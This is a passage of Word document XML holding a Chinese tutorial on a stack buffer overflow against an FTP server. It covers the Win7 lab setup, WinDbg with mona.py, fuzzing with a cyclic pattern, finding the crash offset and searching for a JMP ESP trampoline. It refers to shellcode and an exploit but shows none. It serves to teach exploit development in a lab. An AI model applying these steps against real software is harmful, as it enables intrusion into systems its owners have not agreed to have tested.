          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>为了后续测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE84D57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5)Visual Studio2019</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>写测试代码和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>ShellCode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEBEFA0" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:line="18" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pP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3.2</w:t>
      </w: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配置环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F54B1FB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1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>虚拟机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>win7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>专业版</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>sp1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3CB08B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2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>WDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>，它自带</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>WinDBG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164D8D7B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3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>Python2.7.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38395803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4)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>Visual C++ 2008</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>运行库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF24B00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lastRenderedPageBreak/>
        <w:t>5)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>WinDbg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>插件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>Pykd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3405A9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6)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>复制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>mona.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>windbglib.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>WinDbg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>同目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C9E2E3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7)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>WinDbg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>随便调试一个程序进行测试以上环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5611E4AC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  .load pykd.pyd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>加载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>pykd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077E7BE5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 xml:space="preserve">  !py mona </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>Mona</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A63B8C4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  .reload /f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>加载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>windbg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>符号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB3EFFF" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:line="18" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pP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3.3</w:t>
      </w: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软件测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580AFDB3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FTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>需要符合标准</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>:RFC959</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B3A3CE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1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>建立</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>Socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>连接，连接目标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9FDF44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2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>服务器的欢迎语</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36450DD8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3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>发送”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>USER XXX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>”到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1230DEA7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4)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>接受请求结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DA7592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5)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>详细代码在后文</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>exploit(poc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>4))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DD5821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508AA7A7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jc w:val="center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noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="284ECD8E" wp14:editId="723086B8">
            <wp:extent cx="5238750" cy="22479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4E9E50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4D1C4B70" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:line="18" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pP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3.4</w:t>
      </w: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手动</w:t>
      </w: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Fuzz</w:t>
      </w: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测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5186E293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构建长字符串进行测试，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>mona</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>生成有序长字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>!Py mona pc 3000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>，替换掉”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>+++Haha+++</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>再测试，发现测试代码在等待服务器信息处不能退出，虚拟机中的程序已经崩溃</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAF07E8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5BCF1556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jc w:val="center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noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="4AAD26C9" wp14:editId="6FB5B878">
            <wp:extent cx="5210175" cy="4457700"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="7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727E14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6D5B8613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jc w:val="center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noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="2972D06D" wp14:editId="34B2B0C0">
            <wp:extent cx="5181600" cy="3000375"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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338BAC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33824098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观察</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>windbg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>中的信息，得到异常信息并查找到异常处在字符串中的位置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F4CB7B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182EF35F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jc w:val="center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noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="463396B5" wp14:editId="4429793E">
            <wp:extent cx="5133975" cy="5172075"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="12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3B3424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664C1E7F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jc w:val="center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noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="061D110D" wp14:editId="2423C4D0">
            <wp:extent cx="5105400" cy="5391150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9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3ACAAD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177E0ED7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得到偏移后，在系统中查找一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>JMP ESP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>作为跳板</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0C063A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1A57BAC9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jc w:val="center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noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="0B423609" wp14:editId="061F9BEA">
            <wp:extent cx="5153025" cy="5419725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="8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A57116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0FF01816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用当前指令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>(!py mona jmp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:softHyphen/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>r esp)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>得到的地址不能作为跳板，因为如果转成字符串，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
